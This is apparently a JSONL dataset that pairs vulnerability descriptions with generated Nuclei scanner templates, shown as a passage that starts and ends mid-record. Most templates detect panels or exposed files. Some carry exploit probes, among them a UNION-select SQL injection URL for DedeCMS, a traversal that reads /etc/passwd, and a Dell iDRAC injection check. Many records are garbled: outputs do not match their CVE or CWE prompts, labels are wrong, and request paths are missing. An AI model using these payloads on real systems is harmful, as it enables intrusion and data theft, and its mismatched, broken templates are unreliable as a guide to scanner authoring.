body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-0540"} {"instruction": "Generate a Nuclei template for: Codoso APT Gh0st Malware Hash - Detect", "input": "Title: Codoso APT Gh0st Malware Hash - Detect\nSummary: Codoso APT Gh0st Malware Hash - Detect. Tags: malware, apt, codoso\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: codoso-gh0st-malware\n\ninfo:\n name: Codoso APT Gh0st Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Codoso APT Gh0st Malware Hash - Detect\n tags: malware,apt,codoso\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "codoso-gh0st-malware"} {"instruction": "Generate a Nuclei template to detect Unrestricted Upload of File with Dangerous Type", "input": "Title: Unrestricted Upload of File with Dangerous Type (CWE-434)\nSummary: The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.\nVulnerability Type: Unrestricted Upload of File with Dangerous Type\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: ueditor-arbitrary-file-upload\n\ninfo:\n name: UEditor - PHP Arbitrary File Upload\n author: ChiragArtani\n severity: medium\n description: Detects arbitrary file upload vulnerability in UEditor PHP by attempting to upload and execute a PHP file. This vulnerability allows remote attackers to upload arbitrary files including PHP files, potentially leading to remote code execution.\n tags: ueditor,file-upload,rce,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"PHP Extension\" \n - \"PHP Version\" \n part: body_2\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-434"} {"instruction": "Generate a Nuclei template for: Google Places Photo API Test", "input": "Title: Google Places Photo API Test\nSummary: Google Places Photo API Test. Tags: token-spray, google, places\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-googleplacesphoto\n\ninfo:\n name: Google Places Photo API Test\n author: zzeitlin\n severity: info\n description: Google Places Photo API Test\n tags: token-spray,google,places,photo\n\nhttp:\n - method: GET\n path:\n - \"https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}\" \n matchers:\n - type: status\n status:\n - 302", "category": "generic", "severity": "info", "id": "api-googleplacesphoto"} {"instruction": "Generate a Nuclei template for: Google Firebase DB URL Finder", "input": "Title: Google Firebase DB URL Finder\nSummary: Google Firebase DB URL Finder. Find firebaseio urls to check for security permissions\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: firebase-urls\n\ninfo:\n name: Google Firebase DB URL Finder\n author: panch0r3d\n severity: info\n description: Find firebaseio urls to check for security permissions\n tags: tech,firebase,google,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "firebase-urls"} {"instruction": "Generate a Nuclei template for: Zzzcms 1.75 - Information Disclosure", "input": "Title: Zzzcms 1.75 - Information Disclosure\nSummary: Zzzcms 1.75 - Information Disclosure. There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\\webuploader\\js\\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: zzzcms-info-disclosure\n\ninfo:\n name: Zzzcms 1.75 - Information Disclosure\n author: ritikchaddha\n severity: low\n description: There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\\webuploader\\js\\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore\n tags: zzzcms,info,disclosure,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"var adminpath\" \n - \"var imageMaxSize=\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "zzzcms-info-disclosure"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: project-insight-login\n\ninfo:\n name: Project Insight Login Panel - Detect\n author: dhiyaneshDk\n severity: info\n description: Project Insight login panel was detected.\n tags: panel,edb,helpproject,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/login\" \n matchers:\n - type: word\n words:\n - \"Project Insight - Login\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Mautic Installer Exposure", "input": "Title: Mautic Installer Exposure\nSummary: Mautic Installer Exposure. Mautic is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: mautic-installer\n\ninfo:\n name: Mautic Installer Exposure\n author: DhiyaneshDk\n severity: high\n description: Mautic is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,mautic,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/installer\" \n matchers:\n - type: word\n words:\n - \"Mautic Installation - Environment Check\" \n - \"Ready to Install!\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "mautic-installer"} {"instruction": "Generate a Nuclei template for CVE-2018-20009", "input": "Title: Cross-Site Scripting (XSS) in domainmod domainmod\nSummary: DomainMOD 4.11.01 has XSS via the assets/add/ssl-provider.php SSL Provider Name or SSL Provider URL field.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: domainmod domainmod\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-20009\n\ninfo:\n name: DomainMOD 4.11.01 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters.\n tags: cve,cve2018,domainmod,xss,authenticated,edb,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2018-20009"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: minds\n\ninfo:\n name: Minds User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Minds user name information check was conducted.\n tags: osint,osint-political,minds,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.minds.com/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \") | Minds\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2017-17731", "input": "Title: SQL Injection in dedecms dedecms\nSummary: DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: dedecms dedecms\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-17731\n\ninfo:\n name: DedeCMS 5.7 - SQL Injection\n author: j4vaovo\n severity: critical\n description: DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\n tags: cve,cve2017,sqli,dedecms,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294\" \n matchers:\n - type: word\n words:\n - \"{{md5({{num}})}}\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2017-17731"} {"instruction": "Generate a Nuclei template for: Odoo - Database Manager Discovery", "input": "Title: Odoo - Database Manager Discovery\nSummary: Odoo - Database Manager Discovery. Odoo database manager was discovered.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: odoo-database-manager\n\ninfo:\n name: Odoo - Database Manager Discovery\n author: __Fazal,R3dg33k\n severity: low\n description: Odoo database manager was discovered.\n tags: panel,odoo,backup,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web/database/manager\" \n matchers:\n - type: word\n words:\n - \"Odoo\" \n - \".o_database_delete\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "odoo-database-manager"} {"instruction": "Generate a Nuclei template for: Clearbit API Test", "input": "Title: Clearbit API Test\nSummary: Clearbit API Test. Search for company logos and embed them in your projects\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-clearbit\n\ninfo:\n name: Clearbit API Test\n author: daffainfo\n severity: info\n description: Search for company logos and embed them in your projects\n tags: token-spray,clearbit\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"person\":\" \n - \"\"id\":\" \n - \"\"name\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-clearbit"} {"instruction": "Generate a Nuclei template for CVE-2025-1562", "input": "Title: Missing Authorization in funnelkit funnelkit_automations\nSummary: The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the install_or_activate_addon_plugins() function and a weak nonce hash in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to install arbitrary plugins on the site that can be leveraged to further infect a vulnerable site.\nVulnerability Type: Missing Authorization\nSeverity: critical\nAffected Products: funnelkit funnelkit_automations\nIndicators: unauthorized", "output": "id: CVE-2025-1562\n\ninfo:\n name: Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit - Broken Access Control\n author: s4e-io\n severity: critical\n description: The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the install_or_activate_addon_plugins() function and a weak nonce hash in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to install arbitrary plugins on the site that can be leveraged to further infect a vulnerable site.\n tags: cve,cve2025,wordpress,wp-plugin,wp,wp-marketing-automations,wordpress,authenticated,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2025-1562"} {"instruction": "Generate a Nuclei template for: Azure OpenAI Encryption using Customer-Managed Keys Not Enabled", "input": "Title: Azure OpenAI Encryption using Customer-Managed Keys Not Enabled\nSummary: Azure OpenAI Encryption using Customer-Managed Keys Not Enabled. Ensure that your Microsoft Azure OpenAI service instances are using Customer-Managed Keys (CMKs) instead of Microsoft-managed encryption keys (i.e., default keys used by Microsoft Azure for encryption at rest) in order to have a more granular control over your Azure OpenAI data encryption and decryption process.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-openai-cmk-not-enabled\n\ninfo:\n name: Azure OpenAI Encryption using Customer-Managed Keys Not Enabled\n author: princechaddha\n severity: high\n description: Ensure that your Microsoft Azure OpenAI service instances are using Customer-Managed Keys (CMKs) instead of Microsoft-managed encryption keys (i.e., default keys used by Microsoft Azure for encryption at rest) in order to have a more granular control over your Azure OpenAI data encryption and decryption process.\n tags: cloud,devops,azure,microsoft,openai,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-openai-cmk-not-enabled"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - HERE API", "input": "Title: Content-Security-Policy Bypass - HERE API\nSummary: Content-Security-Policy Bypass - HERE API. Tags: xss, csp-bypass, here-api\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: here-api-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - HERE API\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - HERE API\n tags: xss,csp-bypass,here-api,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"here.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "here-api-csp-bypass"} {"instruction": "Generate a Nuclei template for CVE-2022-24181", "input": "Title: Cross-Site Scripting (XSS) in public_knowledge_project open_journal_systems\nSummary: Cross-site scripting (XSS) via Host Header injection in PKP Open Journals System 2.4.8 >= 3.3 allows remote attackers to inject arbitary code via the X-Forwarded-Host Header.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: public_knowledge_project open_journal_systems\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-24181\n\ninfo:\n name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting\n author: lucasljm2001,ekrause\n severity: medium\n description: PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.\n tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"WeiPHP\" \n - \"/weiphp.css?\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Checkpoint Security Checks", "input": "Title: Checkpoint Security Checks\nSummary: Checkpoint Security Checks. A simple workflow that runs all Checkpoint related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: checkpoint-workflow\n\ninfo:\n name: Checkpoint Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Checkpoint related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "checkpoint-workflow"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ws_ftp-server-web-transfer\n\ninfo:\n name: WS_FTP Server Web Transfer - Panel Detect\n author: johnk3r\n severity: info\n description: WS_FTP Server Web Transfer panel was detected.\n tags: panel,ws_ftp,progress,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2018-6530", "input": "Title: OS Command Injection in dlink dir-860l_firmware and others\nSummary: OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: dlink dir-860l_firmware, dlink dir-865l_firmware, dlink dir-868l_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-6530\n\ninfo:\n name: D-Link - Unauthenticated Remote Code Execution\n author: gy741\n severity: critical\n description: OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n tags: cve,cve2018,d-link,rce,oast,unauth,kev,dlink,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: word\n words:\n - \"User-Agent: curl\" \n part: interactsh_request", "category": "cve", "severity": "critical", "id": "CVE-2018-6530"} {"instruction": "Generate a Nuclei template for: Mysql History - File Disclosure", "input": "Title: Mysql History - File Disclosure\nSummary: Mysql History - File Disclosure. The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: mysql-history\n\ninfo:\n name: Mysql History - File Disclosure\n author: kazet\n severity: low\n description: The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands.\n tags: misconfig,disclosure,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.mysql_history\" \n matchers:\n - type: word\n words:\n - \"_HiStOrY_V2_\" \n - \"show databases;\" \n condition: or\n - type: word\n words:\n - \"application/octet-stream\" \n - \"text/plain\" \n - \"filename=\".mysql_\" \n part: header\n - type: word\n words:\n - \"\" \n - \"text/html\" \n - \"image/\" \n part: response\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "mysql-history"} {"instruction": "Generate a Nuclei template for: Doppler Audit Token", "input": "Title: Doppler Audit Token\nSummary: Doppler Audit Token. Tags: doppler, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: doppler-audit-token\n\ninfo:\n name: Doppler Audit Token\n author: DhiyaneshDK\n severity: info\n description: Doppler Audit Token\n tags: doppler,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "doppler-audit-token"} {"instruction": "Generate a Nuclei template for: Hongjing Human Resource Management System - SQL Injection", "input": "Title: Hongjing Human Resource Management System - SQL Injection\nSummary: Hongjing Human Resource Management System - SQL Injection. There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: CNVD-2023-08743\n\ninfo:\n name: Hongjing Human Resource Management System - SQL Injection\n author: SleepingBag945\n severity: critical\n description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.\n tags: cnvd2023,cnvd,hongjing,hcm,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "critical", "id": "CNVD-2023-08743"} {"instruction": "Generate a Nuclei template for CVE-2010-1353", "input": "Title: Path Traversal in wowjoomla com_loginbox\nSummary: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: wowjoomla com_loginbox\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-1353\n\ninfo:\n name: Joomla! Component LoginBox - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\n tags: cve,cve2010,joomla,lfi,edb,wowjoomla,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2010-1353"} {"instruction": "Generate a Nuclei template for: Landray-OA - Remote Code Execution", "input": "Title: Landray-OA - Remote Code Execution\nSummary: Landray-OA - Remote Code Execution. Landray-OA `erp_data.jsp` is vulnerable to remote code execution vulnerability.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: landray-oa-erp-data-rce\n\ninfo:\n name: Landray-OA - Remote Code Execution\n author: SleepingBag945\n severity: critical\n description: Landray-OA `erp_data.jsp` is vulnerable to remote code execution vulnerability.\n tags: landray,rce,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"{\"message\":\"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "landray-oa-erp-data-rce"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ftm-manager-panel\n\ninfo:\n name: Financial Transaction Manager Login Panel - Detect\n author: idealphase\n severity: info\n description: Financial Transaction Manager login panel was detected.\n tags: panel,ftm,ibm,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"FTM Manager\" \n - \"login-panel\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Azure Databases - Cloud Enumeration", "input": "Title: Azure Databases - Cloud Enumeration\nSummary: Azure Databases - Cloud Enumeration. Searches for Azure databases via their registered DNS names\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: azure-db-enum\n\ninfo:\n name: Azure Databases - Cloud Enumeration\n author: initstring\n severity: info\n description: Searches for Azure databases via their registered DNS names\n tags: cloud,enum,cloud-enum,azure,dns,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "azure-db-enum"} {"instruction": "Generate a Nuclei template for CVE-2019-9762", "input": "Title: SQL Injection in phpshe phpshe\nSummary: A SQL Injection was discovered in PHPSHE 1.7 in include/plugin/payment/alipay/pay.php with the parameter id. The vulnerability does not need any authentication.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: phpshe phpshe\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-9762\n\ninfo:\n name: PHPSHE 1.7 - SQL Injection\n author: DhiyaneshDK\n severity: critical\n description: A SQL Injection was discovered in PHPSHE 1.7 in include/plugin/payment/alipay/pay.php with the parameter id. The vulnerability does not need any authentication.\n tags: cve,cve2019,phpshe,sqli,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{md5({{num}})}}\" \n part: body", "category": "cve", "severity": "critical", "id": "CVE-2019-9762"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: salon24\n\ninfo:\n name: Salon24 User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Salon24 user name information check was conducted.\n tags: osint,osint-blog,salon24,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.salon24.pl/u/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Strona g\u0142\u00f3wna\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Generic Remote File Inclusion", "input": "Title: Generic Remote File Inclusion\nSummary: Generic Remote File Inclusion. Tags: rfi, dast, oast\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: generic-rfi\n\ninfo:\n name: Generic Remote File Inclusion\n author: m4lwhere\n severity: high\n description: Generic Remote File Inclusion\n tags: rfi,dast,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"NessusCodeExecTest\" \n part: body", "category": "generic", "severity": "high", "id": "generic-rfi"} {"instruction": "Generate a Nuclei template for: Quip API Test", "input": "Title: Quip API Test\nSummary: Quip API Test. File Sharing and Storage for groups\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-quip\n\ninfo:\n name: Quip API Test\n author: daffainfo\n severity: info\n description: File Sharing and Storage for groups\n tags: token-spray,quip\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"id\":\" \n - \"\"name\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-quip"} {"instruction": "Generate a Nuclei template for CVE-2014-1842", "input": "Title: Path Traversal in southrivertech titan_ftp_server\nSummary: Directory traversal vulnerability in the web interface in Titan FTP Server before 10.40 build 1829 allows remote attackers to list all usernames via a Go action with a .. (dot dot) in the search-bar value.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: southrivertech titan_ftp_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-1842\n\ninfo:\n name: Titan FTP Server Search Function < 10.40 - User Enumeration\n author: pussycat0x\n severity: medium\n description: Titan FTP Server versions prior to 10.40 build 1829 contain a directory traversal vulnerability in the web interface search functionality. Remote attackers can list all existing users by submitting \"/../\" in the search bar, enabling user enumeration and reconnaissance.\n tags: cve,cve2014,network,ftp,titan-ftp,tcp,passive,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2014-1842"} {"instruction": "Generate a Nuclei template for CVE-2018-1207", "input": "Title: Code Injection in dell emc_idrac7 and others\nSummary: Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: dell emc_idrac7, dell emc_idrac8\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-1207\n\ninfo:\n name: Dell iDRAC7/8 Devices - Remote Code Injection\n author: dwisiswant0\n severity: critical\n description: Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability\nwhich could be used to execute remote code. A remote unauthenticated attacker may\npotentially be able to use CGI variables to execute remote code.\n tags: cve2018,cve,dell,injection,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/login?LD_DEBUG=files\" \n matchers:\n - type: word\n words:\n - \"calling init: /lib/\" \n part: response", "category": "cve", "severity": "critical", "id": "CVE-2018-1207"} {"instruction": "Generate a Nuclei template for: Orbit Fox by ThemeIsle Detection", "input": "Title: Orbit Fox by ThemeIsle Detection\nSummary: Orbit Fox by ThemeIsle Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-themeisle-companion\n\ninfo:\n name: Orbit Fox by ThemeIsle Detection\n author: ricardomaia\n severity: info\n description: Orbit Fox by ThemeIsle Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/themeisle-companion/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-themeisle-companion"} {"instruction": "Generate a Nuclei template for CVE-2021-44228", "input": "Title: Vulnerability (CWE-20) in siemens 6bk1602-0aa12-0tp0_firmware and others\nSummary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and 